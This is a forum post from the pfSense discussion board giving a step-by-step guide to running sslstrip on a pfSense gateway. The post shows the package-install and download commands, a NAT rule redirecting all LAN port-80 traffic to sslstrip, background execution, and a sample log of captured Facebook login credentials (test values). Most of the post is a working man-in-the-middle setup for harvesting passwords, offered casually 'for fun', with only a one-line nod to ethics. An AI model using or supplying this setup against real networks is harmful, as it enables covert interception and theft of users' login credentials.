Netgate Discussion Forum
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Search
    • Register
    • Login

    Running SSLSTRIP on a pfSense box

    Scheduled Pinned Locked Moved Off-Topic & Non-Support Discussion
    1 Posts 1 Posters 5.7k Views
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • A
      alt0001
      last edited by

      Hi all, this is my first post here.

      I consider myself to be a total noob when it comes to pfSense or freebsd. However, I was looking into mitm type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself as to automatically process all traffic without the need for arp poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.

      I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.

      First, we need to add a couple of packages to the box so SSLstrip can actually run:

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz
      

      This installs the Python Twisted Web python-module which is needed for sslstrip functionality. As a bonus, python itself gets installed automatically as a dependency.

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz
      

      The openssl python-module is also needed for sslstrip, I couldn't start sslstrip without it.

      pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz
      

      Installing wget ensures an easy method of getting the sslstrip tar file on your box.

      rehash
      

      Dont know what this is for, but I read online that you need to do this after installing packages.

      cd
      

      Let's run everything from the root home dir…

      wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
      

      Download the sslstrip files

      tar zxvf sslstrip-0.9.tar.gz
      

      Extract the files to the ~/sslstrip-0.9 directory.

      cd sslstrip-0.9
      

      Change to the extracted directory

      python setup.py install
      

      Install the sslstrip files to the system

      So now you can try if it works:

      /usr/local/bin/sslstrip -h
      

      You should get something like this:

      [2.0.2-RC3][root@pfsense.localdomain]/root(2): /usr/local/bin/sslstrip -h
      
      sslstrip 0.9 by Moxie Marlinspike
      Usage: sslstrip <options>
      
      Options:
      -w <filename>, --write= <filename>Specify file to log to (optional).
      -p , --post                       Log only SSL POSTs. (default)
      -s , --ssl                        Log all SSL traffic to and from server.
      -a , --all                        Log all SSL and HTTP traffic to and from server.
      -l <port>, --listen=<port>        Port to listen on (default 10000).
      -f , --favicon                    Substitute a lock favicon on secure requests.
      -k , --killsessions               Kill sessions in progress.
      -h                                Print this help message.
      
      [2.0.2-RC3][root@pfsense.localdomain]/root(3):</port></port></filename></filename></options>
      

      Now, we need to create a nat rule to forward all tcp port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.

      Go to firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, nat ip=<ip address="" of="" your="" box="">, nat ports=10000. A firewall rule should be created automatically for you to put port 10000 open.

      Now in a ssh shell, run

      /usr/local/bin/sslstrip &
      

      This ensures sslstrip remains active even if you close the ssh session.

      Now a logfile is created in root's home dir called sslstrip.log which should contain passwords.

      Output of the file looks like so:

      [2.0.2-RC3][root@pfsense.localdomain]/root(9): cat sslstrip.log
      2012-07-03 21:49:49,290 POST Data (www.facebook.com):
      lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In
      [2.0.2-RC3][root@pfsense.localdomain]/root(10):
      

      You can see I entered testing as a username and testing123 as a password.

      That's all now. Please use this in an ethically responsible way.</ip>

      1 Reply Last reply Reply Quote 0
      • First post
        Last post
      Copyright 2025 Rubicon Communications LLC (Netgate). All rights reserved.